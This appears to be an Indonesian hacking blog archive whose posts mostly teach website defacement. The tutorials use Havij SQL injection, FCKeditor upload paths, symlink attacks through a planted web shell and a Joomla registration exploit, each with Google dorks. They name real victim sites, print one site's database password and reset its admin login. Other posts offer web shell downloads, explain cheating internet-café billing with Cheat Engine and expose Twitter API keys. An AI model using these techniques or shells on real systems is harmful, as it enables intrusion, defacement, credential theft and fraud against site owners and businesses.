Random Post

Januari 2014

Kamis, 30 Januari 2014

Cara Hack Biling Dengan Cheat Engine

Assalamualaikum
Kali ini saya akan Share Tutor Hack Biling Dengan Cheat Engine
Di Warnet Saya Nich. Karena Udah Akrab Sama Adminnya [Hehe]

  


 Langsung aja gan :D

Cara-caranya:

1. Install Dulu Cheat Engine nya!
2. Buka Cheat Engine
3. klik gambar komputer dan kaca pembesar. icon
4.Cari Proses Billingnya
5.cheklist enable speedhack
6.trus isi kolomnya dengan rumus dibawah ini!

nih rumusnya :
0.1=1jam jadi 10 jam
0.2=1jam jadi 5 jam
0.3=1jam jadi 3.33jam
0.4=1jam jadi 2.5 jam
0.5=1jam jadi 2 jam
0.6=1jam jadi 1.66jam
0.7=1jam jadi 1.42jam
0.8=1jam jadi 1.25jam
0.9=1jam jadi 1.11jam
1.0=1jam jadi ya 1jam

Jika Ingin Repost/ Copas Usahakan Kasih Sumber : dzikri-decode.blogspot.com
Diposting oleh di Tidak ada komentar:
Label:

Cara Deface Web Metode Sql Injection Havij

Assalamualaikum
Oke, kali ini saya akan memberikan tutorial tentang bagaimana cara mendeface website dengan havij SQL Injection
Tool havij sendiri fungsinya memang untuk sql injection, jadi kita tidak perlu capek2 untuk inject manual. cukup dengan klik klik langsung beres deh.

Tool ini juga cukup apik, karena sudah disertakan md5 cracker, admin finder dll.
Tool havij yg saya gunakan disini adalah versi 1.10. Bagi yang belum punya tool havij silahkan download :

Disini Sob (^_^)

Bagi yg sudah mahir menggunakan tool ini, pasti sudah tahu dan lewat saja. Namun bagi yang belum pernah mencoba pasti bingung. Simak baik-baik tutorial ini. Langsung saja kita menuju ke TKP.

1. Cari Targetnya dulu dengan dork: berita.php?id=100
Disini saya sudah mendapatkan target yaitu:
http://www.thenaturalbabyco.com/product.php?pID=100032
2. Kemudian buka tool havij kalian, dan masukan url korban dimenu TARGET. Lihat sperti gambar berikut:

    

 3. Setelah itu klik ANALIZE. Tunggu beberapa saat. nah, setelah selesai dan sudah dianalyze, maka akan muncul informasi server target dan yang terpenting adalah nama databasenya. Simak gambar dibawah ini:
4. Sekarang tinggal mencari tabelnya. klik tabel. dan klik GET TABLES simak gambar dibawah ini:
5. Setelah nama-nama tabelnya sudah keluar, sekarang saatnya mencari kolom. Pilih salah satu tabel dengan menchecklistnya lalu klik GET COLUMNS. Simak gambar dibawah ini:

  

 6. Setelah columns dari tabelnya sudah keluar, maka langkah terakhir adalah dump isinya. Saya disini akan mengedump tabel administrator, yang didalamnya terdapat columns username dan password. checklist kolom mana yg ingin didump lalu klik GET DATA. Contoh lihat gambar dibawah ini:

   Nb: Ane Tutup Agar Anda Bisa Usaha Sendiri

 Oke, kita sudah dapat username dan passwordnya. sekarang tinggal mendecrypt passwordnya dan mencari admin pagenya.



  • Untuk mendecrypt password bisa dilakukan ditab md5 lalu masukan passwordnya dan klik Start.
  • Untuk mencari admin page nya bisa dilakukan ditab Find Admin setelah itu masukan url korban dan klik Start.

Nanti akan muncul halaman adminnya. Misalnya tidak muncul bisa menggunakan alternatif lain sperti mencari admin page dengan Admin Finder.

Kalau misalnya adminnya tidak ketemu juga, anda bisa menscannya dengan tool Acunetix. kalau tidak dapat juga. Silahkan pasrah dan cari target lain.

Alternatif lain/tempat mendecrypt password juga ada banyak. Silahkan search di google. Atau bisa juga decrypt disini: www.md5decrypter.co.uk

Copaz Beri Sumber ya Biar gk Ada Salah Paham : dzikri-decode.blogspot.com
Creator : Dzikri Dot ID
Diposting oleh di Tidak ada komentar:
Label:

Selasa, 28 Januari 2014

Cara Mengubah Laptop Menjadi Wifi Hotspot

Assalamualaikum Kamu memiliki lebih dari satu komputer atau perangkat mobile yang ingin terhubung ke Internet? Jika kamu punya koneksi Internet dirumah, kamu bisa membuat Wifi Hotspot sendiri dengan menggunakan Laptop.WiFi sekarang ini menjadi teknologi yang mudah didapat, dimana hampir semua handphone kelas bisnis sudah memiliki dukungan koneksi WiFi. Nah, jika kamu memiliki laptop, maka kamu bisa dengan mudah melakukan sharing koneksi Internet dengan yang lainnya dengan mengubah laptop menjadi WiFi Hotspot menggunakan software. Berikut ini cara mengubah laptop menjadi WiFi HotSpot : 
  •  Download Alatnya
  •  Install Connectify dengan mengikuti langkahnya hingga selesai, lalu restart laptop. 
  • Jalankan program Connectify dan sambungkan koneksi internet modem kamu di laptop seperti biasa. 
  • Setelah koneksi Internet tersambung dengan baik, lakukan pengaturan pada Connectify seperti dibawah: 
Screenshot :

 

Catatan :

  • Hotspot Name : isi nama hotspot Laptopmu
  • Password : isi password untuk koneksi hotspot kamu.
  • Internet : pilih koneksi internet yang akan kamu share/ bagikan.
  • Share Over : pilih hardware wifi yang terdapat pada laptop kamu.
  • Sharing mode : pilih wi-fi access point.
Dari komputer/laptop client koneksikan wifi ke akses point yang telah kita buat pada langkah sebelumnya.




    1. Masukkan password seperti password pada akses point.
    2. Selesai, kamu bisa langsung browsing di laptop server maupun client.


Hotspot Wifi yang kita buat menggunakan laptop ini juga dapat dimanfaatkan untuk iPad, Android dan perangkat lain yang memiliki fitur Wifi. Selain itu, software ini juga dapat digunakan untuk koneksi Ad-Hoc, jadi antar laptop dapat saling terkoneksi seperti layaknya menggunakan kabel LAN, namun bedanya menggunakan wireless, jadi kamu tidak perlu lagi kabel LAN.

Posted By : Dzikri Dot ID
Diposting oleh di Tidak ada komentar:
Label:

Cara Deface Web Metode Fck Editor

Assalamualaikum
Deface website dengan teknik FckEditor ini adalah teknik yang paling mudah dalam mendeface sebuah website
Teknik deface Fck Editor dibagi menjadi 4 yaitu :


1. Powered CubeCart


Adalah module Deface Upload file, kita bisa menggunakan cara ini.


Dork    : Powered By CubeCart V 3.0


Exploit :  /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html


Contoh: www.target.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html





2. Powered By OpenCart


Dork   :  Powered By OpenCart


Exploit:  admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


Contoh : www.target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html





3. Powered By OscMax V 2.0


Dork    : Powered By OscMax V 2.0


Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html


Contoh ;www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html





4. Hacking TXt.


Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima 


Dork   : Inurl:/FCKeditor/editor/filemanager/


Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html


dengan mencarinya dengan google dork atau mengexploit urlnya langsung ( tidak semua website support dengan cara fck editor sebaiknya anda mencarinya dengan google dork saja )





Jika sudah ketemu url target maka akan muncul tampilan seperti  ini.




     
     
     
     
     
     
     
  • Ganti connectornya menjadi PHP    
  • Klik choose file sesuai jenis website jika opencart anda bisa upload file html tetapi jika bukan biasanya hanya bisa upload file txt 
  • Klik Upload Jika berhasil maka akan muncul pesan "File Upload No Error"
  • Klik Get folder untuk mendapatkan URL file yang di Upload
             Dah Selesai Sob :D Tinggal Nama Situ yg Tadi Di Upload 
Posted By : Dzikri Dot ID
Diposting oleh di Tidak ada komentar:
Label:

Tahun 2020 Indonesia Tidak Bisa Internetan

 

Assalamualaikum Benarkah  Tahun 2020 Indonesia Tidak Bisa Internetan ?? Tahukah kamu internet di Indonesia memiliki potensi untuk terhenti pada tahun 2020? Menurut kabar dari staf ahli bidang komunikasi dan media massa Kemenkominfo, Henry Subiakto, kapasitas bandwith internet Indonesia pada 2020 akan lebih dari jumlah yang telah dialokasikan.
  "Henry mengatakan, pada tahun 2020, Indonesia membutuhkan 1.7 MHz, namun alokasi yang disediakan oleh pemerintah sebesar 650 MHz. Bila mulai dari saat ini pemerintah tidak melakukan penataan, maka kemungkinan internet Indonesia akan mati sekitar enam tahun lagi". Menurut Henry penataan dapat dilakukan mulai dari penataan frekuensi, misalnya melakukan pengompresan terhadap penggunaan bandwith oleh stasiun televisi dengan bandwith 8 MHz. Karena seharusnya 8 MHz dapat digunakan oleh sepuluh stasiun TV, bukan hanya satu saja.
 Makanya Beberapa Hari ini Koneksi Internet Kita Sering Down/Up. Mungkin Itu Bisa Terjadi di Dunia. Jika Tanpa Internet apakah kita Bisa Hidup ??? Mau Gimana Gan
Pindah Negara ?? Hehe 



Sumber Google 
Copas Beri Sumber dzikri-decode.blogspot.com
Posted By : Dzikri Dot ID

Diposting oleh di Tidak ada komentar:

Cara Deface Web Metode Symlink

Assalamualaikum

Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob (^_^)

















 

Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.
Selanjutnya akses / buka symlink yang telah agan upload.
















 
Lalu klik user & domain & symlink.
















 

Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".
















 

Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.
Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.
















 

Perhatikan baris ini :
define('DB_HOST', 'localhost');
DB NAME = thefussy_wrdp3
DB USER = thefussy_wrdp3
DB PASSWORD = CZyLRz1EuwSd
DB HOST = localhost
Diatas adalah informasi mengenai Akses Database MySQL.
Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.
















 

Klik koneksi MySQL.















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.
Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.

















 

Lalu, saya klik "wp_user".

















 

Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).
Agan buat password dalam bentuk MD5 Disini Sob (^_^).


Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a



















 
Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.
Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob (^_^). 















 

Saya coba ke halaman login webnya http://thefussyeater.org/wp-admin
Saya login & wauuuuu, kereennn sob (^_^).
Saya berhasil masuk (^_^).
















 


Jika sudah seperti ini terserah anda sob,  
kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Selamat Mencoba (^_^).
Copaz Beri Sumber Cuk :v http://dzikri-decode.blogspot.com
Diposting oleh di Tidak ada komentar:
Label:

Shell AnonGhost Bypass

Langsung Aja Penampakannya :

     

Download Here : Download Now
Diposting oleh di Tidak ada komentar:
Label:

Shell Java Cyber Army [Private]

Shell Java Cyber Army ini Bagus Buat Anda

 Penampakan Shell :


 

Download : Here
Default Password : nabilah
Diposting oleh di 1 komentar:
Label:

Shell 1n73ction V3.3

Langsung Download kk
Fiturnya Cukup Buat Kebutuhan Depes Kalian Hehehe [special]

 Penampakan :
1n73ction shell v3.3 [ Special Edition ]
 
 
Download : Here
Diposting oleh di 1 komentar:
Label:

Cara Membuat Auto Tweet Twitter

Assalamualaikum Wr.Wb .. Bertemu lgi dengan saya @Dzikri_1999, Nah pada kesempatan ini saya akan mengshare Tutorial Cara Membuat AutoTweet Twitter. Oke ga usah banyak basa-basi langsung aja iya ke TKP ^_^

  •     Lalu Upload di Hosting Kalian


Kalau Sudah , Ikuti Langkah Berikut ini :

1. Follow @Dzikri_1999 
2. Masuk ke www.dev.twitter.com/apps lalu klick  Create a new application




 3. Isi Kolom Kolom Kolomnya contoh
    Nama Applications nya jangan ada tulisan "Twitter"
    Link nya jangan di samain seperti yang ada di ScreenShot di bawah ini !!
    Soal nya itu Link punya saya :v





4. Masuk Ke kolom "Setting" seperti ScreenShot di bawah






5. Scroll ke bawah ,terus ganti centang "Read Only" ganti ke "Read and Write"





  6. Kalau udah di Ganti jadi "Read and Write" lalu klik aja tombol "Update this Twitter application's settings"
kalau sudah di klik tombol "Update this Twitter application's settings" nya , lalu      kembali ke "Details" di

    sebelah kiri dari "Setting" Lalu Copy "Consumer_key dan Consumer_secret" nya.




 7. kalau sudah di Copy "consumer_key dan consumer_secret" nya , lalu Paste di Hosting kalian , di file "tweet.php".

ScreenShot di bawah ini ada tulisan consumer key nya dengan isi begini " pTJRXyNZDsDJREhCsbHSQ " jangan di tiru karena itu consumer_key punya saya , ganti dengan consumer_key kalian sendiri dan ganti dan di consumer_secret nya tulisan ini"thC4iXhO1D4lsctki5k1zNm205g1IqaKbIbta7oQLpA"





 8. Kalau sudah di isi sekarang isi "Acces Token dan Acces Token Secret nya"
karena kalian belum membuat Acces Token Buat Dulu Acces Token nya di kolom "Details" di dev.twitter.com , lalu klik Create Acces Token ..





 9. Nanti kalau sudah Create Acces Token, bakal begini Acces Token , dan Acces Token Secret nya , ini Acces Token dan Acces token secret saya pas sudah jadi.






 10. Paste Acces Token dan Acces Token Secret di file  "tweet.php" . contoh : ini di file "tweet.php" nanti di file "tmhOAuth.php" harus di sama kan ..
tapi jangan di samakan seperti screen shot ini , karena screen shot ini Application punya saya jadi kalau kalian menyamakan Kolom nya seperti ScreenShot ini





 11. Kalau sudah diganti "consumer_key ,consumer_secret,user_token,user_secret" nya !
lalu kalian klik tombol "save"
12. Kalau sudah di save kalian masuk ke file "tmhOAuth.php" dan isi "consumer_key , consumer_secret , user_token , user_secret" nya sama kan dengan "consumer_key , consumer_secret , user_token , user_secret" yang ada di file "tweet.php"
13. Kalau sudah lalu klik tombol "Save"
14. lihat domain anda dengan di belakangi "tweet.php"
     Contoh http://domainanda.com/tweet.php
     kalau sudah jadi screenshot nya bakal panjang begini !





 15. Lalu Buat Cronjob di drive.google.com dan kalau sudah jadi isi url kalian di "Drive Google" dengan Command "tweet.php"
contoh , kan domain saya "twitmybot.hol.es" jadi pasang cronjob dengan command ini  "twitmybot.hol.es/tweet.php"
#Nb : Ganti domain "twitmybot.hol.es" dengan domain anda sendiri ^_^


Semoga Bermanfaat ^_^ Semoga postingan saya tentang Tutorial Cara Membuat AutoTweet Twitter dapat bermanfaat bagi kamu :)

Contect Creator : Lhougaz Dot ID
Copaz Beri Sumber
Diposting oleh di Tidak ada komentar:
Label:

Senin, 27 Januari 2014

Shell Indonesian Cyber Army

"Segala bentuk Tutorial yang kami bagikan disini hanya ditujukan sebagai Pengetahuan dan Pembelajaran, Penyalahgunaan atas Tutorial yang ada di blog ini diluar tanggung jawab kami. Use at your own risk." Assalamuallaikum :D

Bingung mau share apa lagi, nih aku share SHELL Indonesia Cyber Army
Tapi Harus Sudah Tanam Shell Di Website Tersebut


[+] PENAMPAKAN [+]
~# LOGIN SHELL #~




~# PENAMPAKAN SHELL #~






 Download Here 

Happy Hacking  :D
Diposting oleh di Tidak ada komentar:
Label:

Cara Deface Metode Exploit

"Segala bentuk Tutorial yang kami bagikan disini hanya ditujukan sebagai Pengetahuan dan Pembelajaran, Penyalahgunaan atas Tutorial yang ada di blog ini diluar tanggung jawab kami. Use at your own risk." Assalamualaikum....

 Kali ini saya akan mengajari anda bagaimana cara deface web Metode Com_User..

Simak Baik2 :D

Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

 "Talk Less Do More!" :p

 oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Exploit : Exploit Jomla.html
2. Nitip nick :Dzikri Dot ID :D

UPDATE:

 Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...


Contoh :
http:/www.agropecuariahumbolt.com/ah/administrator/
 Demo :

1. http://troytradingint.com.pe/
2. http://www.uog.edu.pk/
3. http://www.trexperts.com/jeffreytmiller/
Contoh Web Vuln
Catatan "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba! Cobalah Untuk Semangat"

 Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
 
#Dork Lain:
inurl:index.php/­using-joomla/­extensions/plugins
inurl:index.php/­using/joomla
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-category-list­/50-upgraders
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­28-park-site/­photo-gallery
inurl:index.php/­using-joomla/­parameters/­26-sample-data-articl­es/park-
Inurl:index.php/­plugins
Inurl:index.php/­rss=feed
inurl:index.php/­joomla/content/­category-blog/­24-joomla
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­84-gd-articles
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management
inurl:index.php/­using-joomla/­extension/components/­content-component/­article-category-list­/50-upgraders intext:joomla! 1.7 - open source content management
inurl:index.php/­19-sample-data-articl­es/joomla/­50-upgraders site:id inurl:index.php/­using-joomla/­extensions/templates/­beez-2/­home-page-beez-2
inurl:index.php/­19-sample-data-articl­es/joomla
inurl:Home Page Beez5 joomla 1.6 index.php/­using-joomla/­extensions/­components/­users-component/­registration-form

2. Pilih target sobat, lalu masukin exploit berikut:
/index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:
http://www.agropecuariahumbolt.com/ah/

 4.Kemudian ganti seperti ini  ->http://www.agropecuariahumbolt.com/ah/index.php?option=com_users&view=registration

5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:

6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat ! liat gambar 


NB:"Jika Mencari web dengan dork namun tidak ada kode "Hidden" berarti web itu tidak Vuln.

7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register! 
Note: username, email, boleh diganti sesuka hati.

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!

9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!









10. Lalu masuk kehalaman admin login nya! 

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username : Alif
Password : 123qw


Wiiihhhhhhhh Hebat Sob !! Sobat masuk sebagai admin! trus tebas deh index nya -_-
Kalo Ga Berhasil Berarti Login Berarti Web Tersebut tidak Vuln, Silahkan Cari Target Kan Banyak :p

Semoga Sukses :p
Udah Itu Aja Salam ke keluarga ya hahaha
Copaz Beri Sumber Ya Dzikri-decode.blogspot.com
Diposting oleh di Tidak ada komentar:
Label:
Langganan: Postingan (Atom)